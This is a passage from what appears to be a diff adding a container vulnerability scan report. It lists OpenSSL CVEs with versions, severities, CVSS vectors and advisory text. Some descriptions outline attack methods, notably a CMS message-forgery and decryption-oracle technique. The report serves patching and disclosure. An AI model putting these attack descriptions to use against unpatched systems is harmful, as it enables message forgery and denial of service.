"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 4 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:19061", + "https://access.redhat.com/security/cve/CVE-2026-4438", + "https://bugzilla.redhat.com/2449777", + "https://bugzilla.redhat.com/2449783", + "https://bugzilla.redhat.com/show_bug.cgi?id=2449777", + "https://bugzilla.redhat.com/show_bug.cgi?id=2449783", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453117", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4046", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4437", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4438", + "https://errata.almalinux.org/10/ALSA-2026-19061.html", + "https://errata.rockylinux.org/RLSA-2026:20597", + "https://nvd.nist.gov/vuln/detail/CVE-2026-4438", + "https://sourceware.org/bugzilla/show_bug.cgi?id=34015", + "https://www.cve.org/CVERecord?id=CVE-2026-4438", + "https://www.openwall.com/lists/oss-security/2026/03/23/2" + ], + "PublishedDate": "2026-03-20T20:16:49.623Z", + "LastModifiedDate": "2026-04-07T18:40:02.177Z" + }, + { + "VulnerabilityID": "CVE-2026-45447", + "VendorIDs": [ + "DSA-6335-1" + ], + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45447", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:2b32bbfb0fbb43ac82b8136599397a5a285eb389009f4b0997f7cc2b6180b65c", + "Title": "openssl: Heap Use-After-Free in OpenSSL PKCS7_verify()", + "Description": "Issue summary: A specially crafted PKCS#7 or S/MIME signed message could\ntrigger a use-after-free during PKCS#7 signature verification.\n\nImpact summary: A use-after-free may result in process crashes, heap\ncorruption, or potentially remote code execution.\n\nWhen processing a PKCS#7 or S/MIME signed message, if the SignedData\ndigestAlgorithms field is present as an empty ASN.1 SET, OpenSSL may\nincorrectly free a caller-owned BIO during PKCS7_verify(). A subsequent\nuse of the BIO by the calling application results in a use-after-free\ncondition.\n\nIn the common case this occurs when the application later calls\nBIO_free() on the BIO originally passed to PKCS7_verify(). Depending\non allocator behavior and application-specific BIO usage patterns, this\nmay result in a crash or other memory corruption. In some application\ncontexts this may potentially be exploitable for remote code execution.\n\nApplications that process PKCS#7 or S/MIME signed messages using OpenSSL\nPKCS#7 APIs may be affected. Applications using the CMS APIs for this\nprocessing are not affected.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-416" + ], + "VendorSeverity": { + "alma": 3, + "oracle-oval": 3, + "photon": 3, + "redhat": 3, + "rocky": 3, + "ubuntu": 3 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 8.1 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-45447", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/3aad5eb7af4de4ee0633c30a8541a54d9bbde63c", + "https://github.com/openssl/openssl/commit/7d4a980c62258c5910cc883936e0c8dbab4d75a8", + "https://github.com/openssl/openssl/commit/9dfd688ad2290fc5075cacbc9bf0c9a93eefed54", + "https://github.com/openssl/openssl/commit/a541ae8bfe849a30cc885e8780715c0f488e496c", + "https://github.com/openssl/openssl/commit/c505d7559da5d5f9f2c3913c6883a5562ce7273e", + "https://linux.oracle.com/cve/CVE-2026-45447.html", + "https://linux.oracle.com/errata/ELSA-2026-26275.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-45447", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://ubuntu.com/security/notices/USN-8414-2", + "https://www.cve.org/CVERecord?id=CVE-2026-45447" + ], + "PublishedDate": "2026-06-09T17:17:19.277Z", + "LastModifiedDate": "2026-06-16T02:56:50.707Z" + }, + { + "VulnerabilityID": "CVE-2026-34182", + "VendorIDs": [ + "DSA-6335-1" + ], + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34182", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:ab156b317fd5c6ea6389bb21668b7a145471e77ada60e157a7a50a1f5291ac06", + "Title": "openssl: CMS AuthEnvelopedData Processing May Accept Forged Messages", + "Description": "Issue Summary: Cryptographic Message Services (CMS) processing fails to perform\nsufficient input validation on the cipher and tag length fields of\nAuthEnvelopedData containers, leading to various potential compromises.\n\nImpact Summary: Attackers making use of these vulnerabilities may achieve\nkey-equivalent functionality for a given CMS recipient and/or bypass integrity\nvalidation for a given message.\n\nIn one use case, an attacker may send a CMS message containing\nAuthEnvelopedData with the cipher specified as a non-AEAD cipher. OpenSSL\nerroneously allows this selection, and attempts to decrypt and validate the\nmessage.\n\nAn on-path attacker who captures one legitimate AES-GCM AuthEnvelopedData\naddressed to the victim can re-emit it with the recipientInfos set left\nbyte-for-byte intact, so the victim's private key still unwraps the genuine CEK\n(the content-encryption key), but with the inner OID rewritten to AES-256-OFB\n(Output Feedback Mode, an unauthenticated keystream mode) and with an\nattacker-chosen IV and ciphertext. The victim initializes AES-256-OFB under the\nreal CEK, never consults the MAC field, and CMS_decrypt() returns success.\n\nIf the application under attack responds to the attacker with any indicator\nshowing success or failure of the decryption effort, it is possible for the\nattacker to use this as an oracle to obtain key equivalent functionality for the\nCEK used for the chosen recipient of the message.\n\nIn another use case, an attacker can reduce the tag length of the chosen AEAD\ncipher for a given AuthEnvelopedData container to be a single byte long,\nallowing an attacker to brute force CMS decryption, producing an integrity\nbypass for applications that trust CMS_decrypt() to reject modified content.\n\nThe FIPS modules are not affected by this issue.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-354" + ], + "VendorSeverity": { + "alma": 3, + "photon": 4, + "redhat": 2, + "rocky": 3, + "ubuntu": 2 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 7.4 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-34182", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/03c1f4d45fb963aee7d5833390c507cd290182bc", + "https://github.com/openssl/openssl/commit/439ed7d2c0962ce964482727264668bf277c333f", + "https://github.com/openssl/openssl/commit/7947e6a81eb8776802f159fb6762cb7fcf7e34c7", + "https://github.com/openssl/openssl/commit/9fd97f8cfdc2c0be214998de3b2b55c8edf6c7ac", + "https://github.com/openssl/openssl/commit/d2ca86bcd43e4f17d899f347101766b6107676e0", + "https://nvd.nist.gov/vuln/detail/CVE-2026-34182", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://ubuntu.com/security/notices/USN-8414-2", + "https://www.cve.org/CVERecord?id=CVE-2026-34182" + ], + "PublishedDate": "2026-06-09T17:17:04.857Z", + "LastModifiedDate": "2026-06-15T18:13:05.717Z" + }, + { + "VulnerabilityID": "CVE-2026-34183", + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34183", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:374c2b328bab7cecd9b6fc9228392e1183c675067799850ffa620640b9216160", + "Title": "openssl: Unbounded Memory Growth in the QUIC PATH_CHALLENGE Handler", + "Description": "Issue summary: Remote peer may exhaust heap memory of the QUIC\nserver or client by flooding it with packets containing PATH_CHALLENGE\nframes.\n\nImpact summary: A malicious remote peer can cause an unbounded\nmemory allocation which can lead to an abnormal termination of the\napplication acting as a QUIC client or server and a Denial of Service.\n\nA remote peer may exhaust heap memory by flooding the local\nQUIC stack with PATH_CHALLENGE frames. The local QUIC stack\nallocates a PATH_RESPONSE frame for every PATH_CHALLENGE it receives.\nThe allocated PATH_RESPONSE frame gets freed only when the remote\npeer acknowledges reception of the PATH_RESPONSE frame which will\nnot be done by a malicious peer.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by\nthis issue. The QUIC stack is outside of OpenSSL FIPS module\nboundary.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1325" + ], + "VendorSeverity": { + "alma": 3, + "photon": 3, + "redhat": 2, + "rocky": 3, + "ubuntu": 2 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-34183", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/5b306efb0b3779dfdd0803b4afc9d08c91f11517", + "https://github.com/openssl/openssl/commit/7d06955ebe0ecf8adfd4c1e92018586da47ef9ac", + "https://github.com/openssl/openssl/commit/d2e9efbe4900a373227deb136e8665401404ffac", + "https://github.com/openssl/openssl/commit/fbaa83859c01ad64f497b757aaf51be7d05ed9eb", + "https://nvd.nist.gov/vuln/detail/CVE-2026-34183", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://www.cve.org/CVERecord?id=CVE-2026-34183" + ], + "PublishedDate": "2026-06-09T17:17:05Z", + "LastModifiedDate": "2026-06-15T18:12:39.05Z" + }, + { + "VulnerabilityID": "CVE-2026-42764", + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-42764", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:1bb82957627b37df4080269177fa00561eedc2b52e455c525e6aa91ca37c0ca2", + "Title": "openssl: NULL pointer dereference in QUIC server initial packet handling", + "Description": "Issue summary: Receiving a QUIC initial packet with an invalid token may\ntrigger a NULL pointer dereference in the OpenSSL QUIC server with\naddress validation disabled.\n\nImpact summary: NULL pointer dereference typically causes abnormal termination\nof the affected QUIC server process and a Denial of Service.\n\nIf the address validation is disabled in the OpenSSL QUIC server\nimplementation, an attacker can crash the server by sending an initial\npacket with an invalid or expired token.\n\nBy default, the client address validation is enabled in the OpenSSL QUIC server\nimplementation, which makes the default configuration not vulnerable\nto this issue. However if the SSL_LISTENER_FLAG_NO_VALIDATE is used with\nthe SSL_new_listener() call, the address validation is disabled making the\nvulnerable code reachable.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-476" + ], + "VendorSeverity": { + "alma": 3, + "photon": 3, + "redhat": 2, + "rocky": 3, + "ubuntu": 2 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-42764", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/5e3ed291b8af0b03d5d3b9e56a1da69a187e9729", + "https://github.com/openssl/openssl/commit/a45a0aba8095682c88ff4fc4a784892b8c6f0677", + "https://github.com/openssl/openssl/commit/bf29a458c1a231eca87e384c62b9c2553fa57a91", + "https://nvd.nist.gov/vuln/detail/CVE-2026-42764", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://www.cve.org/CVERecord?id=CVE-2026-42764" + ], + "PublishedDate": "2026-06-09T17:17:07.693Z", + "LastModifiedDate": "2026-06-15T18:25:25.99Z" + }, + { + "VulnerabilityID": "CVE-2026-45445", + "VendorIDs": [ + "DSA-6335-1" + ], + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45445", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:524b04429da9297de1dc030198550cad2ea97d5138f31d9c0aaf2e7a063a0e99", + "Title": "openssl: AES-OCB IV Ignored on EVP_Cipher() Path", + "Description": "Issue summary: When an application drives an AES-OCB context through the\npublic EVP_Cipher() one-shot interface, the application-supplied\ninitialisation vector (IV) is silently discarded.\n\nImpact summary: Every message encrypted under the same key uses the\nsame effective nonce regardless of the IV supplied by the caller,\nresulting in (key, nonce) reuse and loss of confidentiality. If the\nsame code path is used to compute the authentication tag, the tag\ndepends only on the (key, IV) pair and not on the plaintext or\nciphertext, allowing universal forgery of arbitrary ciphertext from a\nsingle captured message.\n\nOpenSSL provides two ways to drive a cipher: the documented streaming\ninterface (EVP_CipherUpdate / EVP_CipherFinal_ex) and a lower-level\none-shot, EVP_Cipher(), whose documentation explicitly recommends\nagainst use by applications in favour of EVP_CipherUpdate() and\nEVP_CipherFinal_ex(). The OCB provider's streaming handler flushes\nthe application-supplied IV into the OCB context before processing\ndata; the one-shot handler did not. Every call to EVP_Cipher() on an\nAES-OCB context therefore ran with the all-zero key-derived offset\nstate left by cipher initialisation, regardless of the caller's IV.\n\nIf EVP_EncryptFinal_ex() is subsequently used to obtain the\nauthentication tag, the deferred IV setup runs at that point and\nclears the running checksum that should have been accumulated over the\nplaintext. The resulting tag is a function of (key, IV) only and\nverifies against any ciphertext produced under the same (key, IV)\npair.\n\nThe OpenSSL SSL/TLS implementation is not affected: AES-OCB is not a\nTLS cipher suite, and libssl does not call EVP_Cipher() in any case.\nApplications that drive AES-OCB through the documented streaming AEAD\nAPI (EVP_CipherUpdate / EVP_CipherFinal_ex) are not affected. Only\napplications that combine the AES-OCB cipher with the EVP_Cipher()\none-shot API are vulnerable.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by\nthis issue, as AES-OCB is outside the OpenSSL FIPS module boundary.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-325" + ], + "VendorSeverity": { + "alma": 3, + "photon": 3, + "redhat": 2, + "rocky": 3, + "ubuntu": 2 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 9.1 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-45445", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + 